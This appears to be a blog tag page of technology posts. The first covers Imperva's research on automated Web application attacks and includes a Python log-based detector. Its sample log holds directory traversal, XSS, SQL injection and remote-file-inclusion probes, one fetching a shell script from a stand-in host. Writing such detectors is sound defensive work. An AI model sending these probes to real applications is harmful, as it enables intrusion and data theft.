Posts tagged applications

Report: Web Applications Attacked Every 2 Minutes


Data security company Imperva released research today that says Web applications are probed or attacked 27 times an hour, or once every two minutes. At the peak of attacks, some Web applications see probes or attacks 25,000 times an hour, or seven times per second. The research gives concrete numbers to what security researchers, governments and enterprises have known for a while – their networks are persistently under attack.

When researchers look for malware and attack vectors, the tendency is to look for vulnerabilities in the network perimeter or in code. Yet most of the major data breaches in recent news have been the result of attacks on Web applications such as email and data-driven systems. The attackers' goal is to break applications with automated attacks that probe for known vulnerabilities until an application cracks and spills its data straight into their hands.


Imperva saw three distinct trends in observing Web app attacks from Dec. 2010 to May 2011: the attacks rely on four common techniques, they are automated, and most of the attacking hosts are located in the United States.

Imperva says that 61% of attacks originate from botnet hosts in the U.S. That does not mean that the people running the attacks are located in the U.S. When botnet controllers want to hit a specific target, they prefer to use compromised computers close to it. What the U.S. share really says is that a lot of American computers are infected with malware and therefore belong to some botnet. For instance, if attackers want to hit the U.S. government, the botnet's command-and-control servers might activate the 1,000 infected computers closest to Washington, D.C. About 10% of attacks originated from China, with Sweden and France also large contributors. China's share tracks its raw number of attackers, while Sweden has some of the most widespread and robust broadband in the world, which makes its infected machines well connected.


The large number of attacks stems from botnet automation. Imperva said that it sees patterns in which an application is attacked in heavy bursts of many thousands of requests per hour, followed by quieter periods. In essence, the criminal hackers are looking to break the application quickly by testing a long list of known vulnerabilities. If it doesn't crack, their attention turns elsewhere (criminal hackers are notorious for preferring easy targets), and the automated scans come back later for another look.

While Imperva was not specifically monitoring the Lulz Security attacks at their peak in June, it noted that they looked very similar to what its research had turned up. "Hack" is a vague term; as far as the general public knows, the attacks were some complicated computer business that led to data being stolen. Yet security researchers see four common types of attack, which Imperva calls "the unfab four": directory traversal, cross-site scripting (XSS), SQL injection and remote file inclusion (RFI). These attacks come in two waves: scan and exploit. An attacker may use directory traversal and cross-site scripting probes during the scan phase and then hit the application with SQL injection or RFI in the exploit phase.
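Putting the scan-and-exploit pattern into something you can run: the Python below is an added example, not part of Imperva's report or this post, that classifies Web server log entries against simple signatures for the four attack types and flags sources that hit an application in the kind of burst the report describes. The access-log lines are constructed for the example, the signatures are deliberately minimal (a production WAF or IDS ruleset is far broader, and the RFI and SQL injection patterns here will produce false positives on legitimate redirect parameters and quoted text), and the 60-second window and burst threshold are tunable assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# Constructed sample lines in Apache "combined" log format. Addresses come from
# RFC 5737 documentation ranges; nothing here is taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Jul/2011:10:00:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.7 - - [14/Jul/2011:10:00:01 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
203.0.113.7 - - [14/Jul/2011:10:00:02 +0000] "GET /item?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0 "-" "Mozilla/4.0"
203.0.113.7 - - [14/Jul/2011:10:00:02 +0000] "GET /page.php?include=http://198.51.100.9/shell.txt? HTTP/1.1" 200 100 "-" "Mozilla/4.0"
198.51.100.20 - - [14/Jul/2011:10:00:05 +0000] "GET /about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Minimal signatures for the four attack types, matched against the URL-decoded
# request target so that %2e%2e%2f and ../ are treated alike.
SIGNATURES = {
    "directory_traversal": re.compile(r"(\.\./|\.\.\\|/etc/passwd|\\windows\\)", re.I),
    "xss": re.compile(r"(<script\b|javascript:|\bon(error|load|mouseover)\s*=)", re.I),
    "sqli": re.compile(r"(union\s+select|'\s*(or|and)\s+'?\w+'?\s*=|\bsleep\s*\(|;\s*drop\s)", re.I),
    "rfi": re.compile(r"=(https?|ftp)://", re.I),  # a parameter whose value is a remote URL
}
# The post's two-wave model: traversal and XSS as scanning, SQLi and RFI as exploitation.
PHASE = {"directory_traversal": "scan", "xss": "scan", "sqli": "exploit", "rfi": "exploit"}


def classify_request(target):
    """Return the sorted list of attack categories whose signature matches the target."""
    decoded = unquote_plus(unquote_plus(target))  # decode twice to catch %252e%252e double encoding
    return sorted(name for name, pattern in SIGNATURES.items() if pattern.search(decoded))


def parse_log(text):
    """Yield one event dict per parsable line; lines that do not match the format are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        yield {
            "ip": m["ip"],
            "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "target": m["target"],
            "status": int(m["status"]),
            "categories": classify_request(m["target"]),
        }


def detect_bursts(events, window_seconds=60, threshold=3):
    """Find sources whose hostile requests reach `threshold` inside any sliding window.
    Returns {ip: peak number of hostile requests seen within one window}."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["categories"]:
            by_ip[ev["ip"]].append(ev["time"])
    window = timedelta(seconds=window_seconds)
    bursts = {}
    for ip, times in by_ip.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            bursts[ip] = peak
    return bursts


def analyze(log_text, window_seconds=60, threshold=3):
    """Classify every request, tally categories and phases, and flag bursty sources."""
    events = list(parse_log(log_text))
    by_category = Counter(cat for ev in events for cat in ev["categories"])
    by_phase = Counter(PHASE[cat] for ev in events for cat in ev["categories"])
    return {
        "events": events,
        "by_category": dict(by_category),
        "by_phase": dict(by_phase),
        "bursts": detect_bursts(events, window_seconds, threshold),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ev in report["events"]:
        if ev["categories"]:
            print(ev["ip"], ev["target"], ev["categories"])
    print("phases:", report["by_phase"], "bursts:", report["bursts"])
```

Run against the constructed log, the single source 203.0.113.7 is classified as one scan-phase hit each for traversal and XSS and one exploit-phase hit each for SQL injection and RFI, all within two seconds, which is exactly the burst shape worth alerting on; the benign request from 198.51.100.20 produces nothing. The double URL-decode matters: a scanner that sends `%252e%252e%252f` would slip past a single decode.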


Overall, Imperva's findings put numbers on the automated, opportunistic attack traffic that every Internet-facing application attracts. This is background noise rather than the targeted campaigns the term Advanced Persistent Threat (APT) usually describes, but it exercises the same set of vulnerabilities a targeted attacker will try first. The company recommends that agencies and corporations learn how to detect and deter automated attacks and perform their own scans to find known vulnerabilities before attackers do. Companies that know their own security weaknesses and communicate with the security community can withstand these attacks, and the attack data they collect can be turned back against the criminals behind them.


A New API for Bringing Cloud-based SEO Tools into Other Applications: Web CEO
PR Web (press release)
Web CEO, a leader in SEO desktop software, has just announced new features in Web CEO Online (http://www.webceo.com/), its web-based SEO solution. These include an updated logic and design of the application interface, the opening of an API and


Develop Windows 8/Metro Style Applications Today with Metro Dynamis

New API Aims to Unite Customer Service Applications

Atlassian, New Relic, OTRS, Pivotal Labs, Service Now, SugarCRM, and Zendesk have agreed to support a common JSON API specification for customer service applications called NetworkedHelpDesk.org.

The idea is to make it possible for all applications related to a customer’s experience to talk to each other, from help desk to bug tracking to project management. “Where things start to fall through the cracks is when customer service has to cross organization boundaries,” says Zendesk COO Zack Urlocker. “Either within the organization, like customer service to engineering, or outside of the organization like to a component vendor.”


When a customer service representative has to reach outside his own team to get an issue resolved, things can start getting messy. If someone from outside the customer service department takes over an issue, how do they track whether it’s resolved or not? Do they record customer interactions in a way that customer service can access later if the customer calls again?

These are the sort of issues that can end up driving both customers and reps bonkers, and NetworkedHelpDesk.org is designed to make things easier. The organization was founded by Atlassian, New Relic, OTRS, Pivotal Tracker, Service Now, SugarCRM, and Zendesk. Fifteen other companies have endorsed the standard, including: Coherence Design, Connect2Field, CustomWare, Freshbooks, GroundWork, PagerDuty, Pervasive, Rypple, Twilio, and Wildbit.

The first integration based on the new standard will be between Atlassian’s bug tracker JIRA and Zendesk.

The new API also allows applications to share information between instances of the same application at different companies. To kick things off, Zendesk is enabling its users to share tickets across companies.

One of the biggest challenges in this area is procedural, not technological. Getting people from outside the customer service department to add notes to a ticket, mark an issue as resolved or otherwise participate in the customer service department’s process is easier said than done. But making it easier for employees in other departments to participate in that process is certainly a step in the right direction. If someone from engineering or sales or management can update a help desk ticket from within the applications they use every day, instead of having to go into some new application, they are more likely to actually do it.

Many of these applications, including Zendesk, already had APIs that made it relatively easy to integrate into other software. Some already have integrations baked in – Rypple, for example, already integrates with Pivotal Tracker. But it’s good to see a cross-company initiative like this that will make it easier for companies to create new integrations.


StreamWork Growing Up: It Can Now Integrate with Other SAP Applications

Jo: A Lightweight Framework for Building Cross-Platform Mobile Applications

Jo is a JavaScript framework for mobile applications. It's fully compatible with PhoneGap, which it relies on for creating native applications. It's designed to be as lightweight as possible: its minified and gzipped JavaScript is just over 12KB with no dependencies. In addition to mobile Web apps and native apps, Jo can be used to build dashboard widgets.

Jo was built by Dave Balmer, a veteran Yahoo developer now working for HP on WebOS.


According to Balmer's JSConf presentation, the core principles of Jo are:

  • Don’t try to “fix” JavaScript
  • Let CSS3 do its job
  • Keep the code light

He says Jo also follows many of the principles from JavaScript: The Good Parts:

  • Constructor nesting
  • Method chaining
  • Custom extend() method
  • Observer patterns
  • Supports either bind or this


Build CouchApps-style Applications with Redis and Webdis

3 Ways to Virtualize Applications with Distributed Computing

The explosion of data driven by sensors, data mining, social media and other Web-based interactions means that more and more companies will need to find ways of dealing with massive data sets, even companies that haven't typically been data driven before. New business analytics applications may require more processing power than your organization has ever needed, so you have to find ways to handle data as efficiently as possible. Infrastructure-as-a-service providers and inexpensive data warehousing appliances with in-memory analytics will be the right option for many organizations. But some may find distributed computing a better fit for their big data needs.

Scientists and academics have been taking advantage of distributed computing for years, but it’s an approach that can benefit information workers in other areas. Here are some methods of running applications in distributed environments, including some newer approaches.


Beowulf Clustering

Made popular by NASA in 1993, cluster computing uses commodity hardware to pool resources for a single application. Pooling multiple systems lets you take advantage of parallel processing, which puts multiple processors to work on a problem simultaneously. For workloads that split into independent pieces, multiple slower processors working in parallel are generally more cost-effective than a single fast processor working alone. Supercomputers use multiple processors for parallel processing, but a cluster of low-end machines working in unison can become the equivalent of a large supercomputer.

Beowulf clustering is a popular architecture for cluster computing. The open source Parallel Virtual Machine (PVM) package and Message Passing Interface (MPI) implementations such as Open MPI or MPICH are the common software for building these clusters.

The advantage of using this approach is that you can run an application on a large number of inexpensive pieces of hardware, including systems with completely different hardware. However, some of the newer methods we’ll discuss next may be preferable.

Server Aggregation

Although a Beowulf cluster attempts to mimic the behavior of a single machine with multiple processors, each part of the cluster still has its own operating system and software stack installed. Instead of having a virtual application that runs across several machines with each running an operating system, the server aggregation approach runs a single instance of an OS across all the servers in a cluster. Therefore, all the physical resources go to the virtual machine.

This can be a real cost saver. The cost of servers is non-linear, so it’s generally cheaper to buy several two-socket systems than a single multi-socket system. And since you’ll have multiple servers, they can be used for other purposes when you don’t need them for massive number crunching jobs.

Server aggregation is a relatively new approach to virtualization. As far as we know the only company to offer server aggregation solutions is ScaleMP. However, we expect to see this approach take off over the next few years.

Server aggregation makes sense if you want to use your own hardware. But what if you want to use a public infrastructure-as-a-service?

Virtual Cluster Appliances

A virtual appliance is typically a VM designed to perform a specific function with minimal configuration. Virtual cluster appliances are VMs designed for cluster computing right out of the box.

One of the advantages here is that these VMs can be deployed to a cloud service like Amazon EC2. Instead of hosting several physical servers running virtualization or aggregation software, you can have many virtual servers running in parallel in the cloud. You still get the advantage of massively parallel computing, but without the hassle of running physical infrastructure.

The Nimbus Project is an open source toolkit for creating virtual infrastructure for cluster computing. It was used by the STAR project to build a 100-VM cluster on EC2. Another source of virtual cluster appliances is Grid Appliance, which offers both a general-purpose cluster appliance and one built specifically for Apache Hadoop.


Virtual Networks for Virtual Applications

You've prepared your critical applications for virtualization. You've tested and selected a virtualization platform. You've built out a fleet of virtual servers and migrated your applications to them. Your hypervisor is configured and you're ready to start sending your users to your spiffy new virtual environment. Wait. There's one more step you may want to take.

Just because your servers are virtual doesn’t mean they don’t need network infrastructure. Running multiple virtual servers on the same machine can create I/O bottlenecks and reduce the efficiency of your applications. Fortunately, you can use virtual I/O technology to make sure you’re getting the most out of your network infrastructure and eliminate bottlenecks.


A typical hypervisor environment will require six to eight physical network cards. Each of those cards will need a network cable, and each cable will need a port on a switch. Your virtual servers are getting physical fast.

I/O virtualization provides virtual network cards that satisfy these requirements without requiring actual physical cards. The hypervisors can’t tell the difference. These virtual cards can share a single cable using a single port on a switch, cutting down on the gear required to support your servers.

You can use I/O virtualization to:

  • Reduce costs, thanks to having less hardware to purchase.
  • Reduce complexity, thanks to having fewer cables and a central, virtual place to manage connections.
  • Reduce space requirements, again thanks to having less hardware and fewer cables.

Some I/O virtualization solutions also offer bandwidth throttling. In a physical networking environment you're typically faced with a choice between a 1 Gb/s connection and a 10 Gb/s connection. If you have a server that requires 3 Gb/s of bandwidth, you'd need to provide a 10 Gb/s connection, and the other 7 Gb/s of capacity are wasted. Worse, if a server that typically doesn't need more than a 1 Gb/s connection suddenly needs 2 Gb/s, you need to upgrade the whole connection.

Using virtualization, you can allocate capacity to servers however you see fit. If you have three servers requiring 3 Gb/s each, you can split one 10 Gb/s connection instead of providing three separate 10 Gb/s connections. If one of those servers ends up needing more bandwidth, you can dynamically reallocate bandwidth from another server that isn't using its share.
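To make the reserve-and-borrow model concrete, here is an added example (not from the original post or from any I/O virtualization vendor) that applies the same idea with the Linux kernel's own traffic shaper rather than a vendor appliance: it checks that the guaranteed shares fit inside the physical link and then emits the tc HTB commands that give each virtual server a guaranteed rate while letting it borrow up to the full link when the others are idle. The interface name, server addresses and rates are illustrative assumptions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Guarantee:
    """One virtual server's reserved share of the uplink (values are illustrative)."""
    name: str
    ip: str            # address whose egress traffic the class will shape
    rate_gbps: float   # guaranteed bandwidth


def plan_allocation(link_gbps, guarantees):
    """Turn per-server guarantees into HTB rate/ceil pairs.

    rate is what a server is always entitled to; ceil is how far it may borrow
    when other classes are idle (the whole link here). The sum of guarantees may
    not exceed the physical link, otherwise the guarantees are fiction."""
    if any(g.rate_gbps <= 0 for g in guarantees):
        raise ValueError("every guarantee must be positive")
    total = sum(g.rate_gbps for g in guarantees)
    if total > link_gbps:
        raise ValueError(f"oversubscribed: {total} Gb/s reserved on a {link_gbps} Gb/s link")
    return {
        "link_gbps": link_gbps,
        "unreserved_gbps": round(link_gbps - total, 3),
        "classes": [
            {"name": g.name, "ip": g.ip, "rate_gbps": g.rate_gbps, "ceil_gbps": link_gbps}
            for g in guarantees
        ],
    }


def _mbit(gbps):
    """Express gigabits per second as the integer megabit string tc expects."""
    return f"{int(round(gbps * 1000))}mbit"


def render_tc(iface, plan):
    """Emit the tc commands that realize the plan on `iface` (run as root, in order)."""
    link = _mbit(plan["link_gbps"])
    cmds = [
        f"tc qdisc add dev {iface} root handle 1: htb default 99",
        f"tc class add dev {iface} parent 1: classid 1:1 htb rate {link} ceil {link}",
    ]
    for minor, c in enumerate(plan["classes"], start=10):
        cmds.append(
            f"tc class add dev {iface} parent 1:1 classid 1:{minor} htb "
            f"rate {_mbit(c['rate_gbps'])} ceil {_mbit(c['ceil_gbps'])}"
        )
        cmds.append(
            f"tc filter add dev {iface} parent 1: protocol ip prio 1 u32 "
            f"match ip src {c['ip']}/32 flowid 1:{minor}"
        )
    # Traffic that matches no server lands in the default class, which only gets
    # the unreserved remainder (never less than 1 Mb/s so it is not starved outright).
    leftover = max(plan["unreserved_gbps"], 0.001)
    cmds.append(f"tc class add dev {iface} parent 1:1 classid 1:99 htb rate {_mbit(leftover)} ceil {link}")
    return cmds


if __name__ == "__main__":
    # Three servers needing 3 Gb/s each on one 10 Gb/s uplink, as in the text above.
    plan = plan_allocation(10, [
        Guarantee("app1", "10.0.0.11", 3),
        Guarantee("app2", "10.0.0.12", 3),
        Guarantee("app3", "10.0.0.13", 3),
    ])
    print("\n".join(render_tc("eth0", plan)))
```

With three 3 Gb/s guarantees on a 10 Gb/s link, each server's class gets `rate 3000mbit ceil 10000mbit`: 3 Gb/s is always available to it, and when a neighbour is quiet it can climb toward the full link. The oversubscription check is the part worth keeping even if you never run tc: an appliance that lets you reserve 12 Gb/s on a 10 Gb/s port is handing out guarantees it cannot honour.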

Several vendors offer I/O virtualization solutions, including established companies like Brocade, Cisco, Dell, HP and IBM as well as younger companies like 3Leaf and Xsigo. Considering the benefits of virtualizing your networks, it’s worth looking into early in your migration plans.


New XML Standard for Super-Fast, Lightweight Applications Announced by W3C

From embedded sensors to high-frequency stock trading to everyday mobile web applications, the race is on for technologists to build the most efficient systems for quickly streaming large sets of data from one device to another. Sometimes the format the data is communicated in carries a high cost in efficiency. Today the web's most venerable standards body, the World Wide Web Consortium (W3C), announced official support for a new standardized data format for super-efficient transmission of data.

Efficient XML Interchange, or EXI, is described as a very compact representation of information in XML (Extensible Markup Language). EXI is so efficient that the W3C says it has been found to improve the performance, network efficiency and power consumption of applications that use XML by up to 100-fold, including but not limited to consumer mobile apps. It is particularly useful on devices with little memory or low bandwidth.


A Historic Agreement

EXI has been used in commercial contexts for more than seven years, but today's adoption of the format as a formal standard is the culmination of years of collaboration between the W3C and 23 different corporate and academic institutions from around the world, including Oracle, IBM, Adobe, Chevron, Stanford University, Boeing, Canon, France Telecom, Intel, the Web3D Consortium and others.

It’s an amazing world where the transmission of large sets of data is costly enough relative to their creation, storage and processing (the price of those has fallen so much already) that industries have a strong incentive to work together to use standards to reduce those data transmission costs substantially.

The creation of a new data transmission standard format is an event of historic importance; it’s like a new trans-continental railroad network has been unveiled, but in this case with standard rail-widths primed to make the delivery of all kinds of goods up to 100 times faster and cheaper than ever before. Florida oranges are going to make it to Minnesota for the first time, you might say, but in this century that will be a metaphor for massive sets of real-time data jumping from device to device around the world, enabling the creation and delivery of previously unimaginable products and services made of that data.

Foundational Platforms vs. Market Fragmentation

XML is a relatively open-ended data format that supports the definition of new vocabularies of data fields, scoped by namespaces, in a standardized and predictable format. The W3C says XML standards are "omnipresent in enterprise computing and are a part of the foundation of the Web." RSS (Really Simple Syndication) is one of many XML-based formats, as is XBRL, the XML format for business reporting data. The standardization of these formats allows data to be shared easily across different applications and devices, without the challenge of translating data from proprietary formats.

The W3C says it’s been clear for years that in low memory or low bandwidth situations, basic XML carried too high a cost for data transmission. “Market demand led to the proliferation of application-specific approaches,” the Consortium said today, “but most were neither efficient nor general enough, and they sacrificed the interoperability that makes XML so valuable.”

To address that fragmentation of standards, the W3C brought together a wide variety of organizations seeking advances on XML in industries ranging from smart electrical grids to defense technology to consumer devices.

The editing of the EXI standard has been led by John Schneider, CTO of a company called AgileDelta, which has been offering EXI-based products for seven years. "They've achieved over 100-fold performance improvements and expanded their data networks to high speed aircraft, automobiles, mobile devices and sensor networks," Schneider says of technologies leveraging EXI. "At the same time, they've achieved dramatic cost savings by using open Web standards and off-the-shelf products in place of the custom protocols, gateways and applications previously required by these applications."

You can learn more about EXI at the W3C’s website.
